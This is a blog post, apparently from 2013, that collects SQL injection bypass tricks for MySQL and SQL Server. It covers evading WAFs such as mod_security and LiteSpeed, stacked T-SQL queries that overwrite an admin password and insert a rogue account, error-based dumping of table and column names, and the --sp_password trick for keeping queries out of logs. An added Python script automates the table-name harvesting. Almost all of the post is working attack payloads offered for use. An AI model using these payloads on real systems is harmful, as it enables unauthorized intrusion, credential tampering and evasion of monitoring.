
Tuesday, July 2, 2013

A summary of SQLi bypass tricks

- When a site blocks union, select, convert and similar keywords, the injected query comes back as a blank page. In that case mix upper- and lower-case letters inside the keyword (UniON, SeLECt, ...) or encode your string arguments as ASCII codes (for example with char()) so the literal keyword never appears in the request. This only beats a filter that matches the exact lower-case spelling; MySQL itself treats keywords case-insensitively, so the query still runs.

- Other sites also return what looks like a blank page. Look over the whole page carefully, including the title. If you still see nothing, view the page source: the injected column is often rendered somewhere invisible, such as a hidden attribute or an HTML comment.

- When a table_name query shows nothing, wrap it as unhex(hex(group_concat(table_name))). The round trip through hex casts the result to a binary string, which usually sidesteps a character-set mismatch between the column and the page, so the names render.

- When the query returns
Forbidden
You don't have permission to access /news.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

or

Not Acceptable
An appropriate representation of the requested resource / could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

(both are Apache block pages, typically produced by a WAF rule set such as mod_security), wrap the keywords in MySQL version-conditional comments, /*! */ (e.g. /*!union*/, /*!select*/, or information_schema./*!tables*/). MySQL executes the text inside /*! ... */ as SQL, while a filter that looks for the keyword followed by a space sees only a comment.

- If the query returns:
406 Not Acceptable
This request is not acceptable Powered By LiteSpeed Web Server
LiteSpeed Technologies is not responsible for administration and contents of this web site!
you have to get creative. For example, replace every space with %0A (a URL-encoded newline, which MySQL accepts as whitespace between tokens), and so on.

- And if you run into this error:
Error 500: Internal Server Error
The server encountered an unexpected condition which prevented it from fulfilling the request.

The problem is on the server side, not with your browser or the address. Most probably, a certain service (e.g., Tomcat engine) is down. Please contact your webmaster.
use the so-called "buffer overflow" query:

id=.. and (select 1)=(select 0xAAAAAAAAAAAAAAAA) union select 1,2,3.... (use about 1000 A's in the hex literal)

Despite the name this is not a memory-corruption bug. The long hex literal pads the request so that a WAF which only inspects the first part of a parameter never reaches the UNION SELECT, and (select 1)=(select 0xAAA...) is always false (the binary string converts to 0), so the original row drops out and only the UNION rows are displayed.

Some other queries (these are T-SQL, for Microsoft SQL Server; each one starting with ';' is a stacked query appended to the application's own statement)
- Create a table and fill it with every table name:
;drop table thanggiangho create table thanggiangho (id int identity, kingnus varchar(8000)) insert into thanggiangho select table_name from information_schema.tables--sp_password
(varchar(8000) is the largest varchar(n) SQL Server accepts. The trailing --sp_password is only a comment to the parser, but SQL Server suppresses any statement containing sp_password from trace/Profiler output, so the query does not show up in the logs.)

- Change the admin password. Taking the example above, username: kingnus / password: ceh:
;UPDATE table1 SET password='ceh' WHERE username='kingnus'--

- Insert a new record into the table:
;INSERT INTO table1 (ID, username, password, details) VALUES (99,'kingnus','ceh','Online')--
(if ID is an identity column, SQL Server rejects an explicit value unless IDENTITY_INSERT is on; leave ID out of the column list in that case)

- Find every table whose name looks like admin, user, member, account, login...:
and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name like '%admin%' or table_name like '%Member%' or table_name like '%User%' or table_name like '%account%' or table_name like '%login%'))--sp_password

and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('') and (table_name like '%25admin%25' or table_name like '%25Member%25' or table_name like '%25User%25' or table_name like '%25account%25' or table_name like '%25login%25')))--sp_password
(convert(int, 'some_table') fails, and the error message leaks the name. %25 is the URL-encoded % for use in a GET parameter. To get the next table, put every name you have already seen inside the not in ('') list.)
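An added Python example (not part of the original post) that automates the convert(int, ...) probe above: it rebuilds the not in (...) list from the names already leaked, URL-encodes the payload the way the %25 form expects, and parses SQL Server's conversion error to pull out one table per round. fake_server and FAKE_TABLES are a constructed stand-in for the vulnerable page, so the loop runs offline; against a real target, send would perform the HTTP request.

```python
import re
from urllib.parse import quote

# Name fragments the probe on the page searches for in information_schema.tables.
PATTERNS = ("admin", "Member", "User", "account", "login")

# Constructed stand-in for the target database (not from the page).
FAKE_TABLES = ["tbadmin", "members", "news", "user_login", "products"]

def build_probe(excluded):
    """The page's probe: convert(int, <first matching table>) raises a conversion error
    that leaks the name. Names already seen go into NOT IN so each round yields the next.
    --sp_password keeps the statement out of SQL Server trace/Profiler output."""
    not_in = ",".join(f"'{t}'" for t in excluded) or "''"
    likes = " or ".join(f"table_name like '%{p}%'" for p in PATTERNS)
    return ("and 1=convert(int,(select top 1 table_name from information_schema.tables "
            f"where table_name not in ({not_in}) and ({likes})))--sp_password")

def to_url(sql):
    """URL-encode for a GET parameter: '%' becomes %25 and '+' would become %2B, as on the page."""
    return quote(sql, safe="")

# SQL Server's message for convert(int, 'text'); the n? also matches nvarchar columns.
ERROR = re.compile(r"converting the n?varchar value '([^']*)' to data type int")

def harvest(send, max_rounds=50):
    """Drive the probe until the server stops erroring, collecting one table name per round."""
    found = []
    for _ in range(max_rounds):
        m = ERROR.search(send(build_probe(found)))
        if not m:
            break
        found.append(m.group(1))
    return found

def fake_server(sql):
    """Constructed vulnerable page: emulates SQL Server evaluating the probe over FAKE_TABLES.
    A matching row makes convert(int, 'name') fail; with no row, convert(int, NULL) is
    NULL and the page renders normally. LIKE is treated case-insensitively, as under the
    default collation."""
    m = re.search(r"not in \(([^)]*)\)", sql)
    excluded = set(re.findall(r"'([^']*)'", m.group(1))) if m else set()
    for t in FAKE_TABLES:
        if t not in excluded and any(p.lower() in t.lower() for p in PATTERNS):
            return (f"Msg 245: Conversion failed when converting the nvarchar value "
                    f"'{t}' to data type int.")
    return "<html><body>normal page</body></html>"

if __name__ == "__main__":
    print(to_url(build_probe([])))
    print(harvest(fake_server))
```

The same loop works for the column-name variant: swap information_schema.tables for information_schema.columns with a table_name = '...' condition and keep everything else. Because each round costs one request, the page's @temp concatenation trick is faster when stacked queries are allowed; this iteration is the fallback when they are not.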

- Get all table names at once:
; begin declare @temp varchar(8000) set @temp=':' select @temp=@temp%2btable_name%2b'/' from information_schema.tables select @temp as id into kingnus end--
or 1=(select id from kingnus)--
; drop table kingnus--
(%2b is the URL-encoded +. The first statement concatenates every table name into one ':a/b/c/' string and stores it in a new table kingnus; the second forces a conversion error whose message contains the whole string; the third cleans up.)

- Get all column names from a table, e.g. table tbadmin:

; begin declare @temp varchar(8000) set @temp=':' select @temp=@temp%2bcolumn_name%2b'/' from information_schema.columns where table_name='tbadmin' select @temp as id into kingnus end--
or 1=(select id from kingnus)--
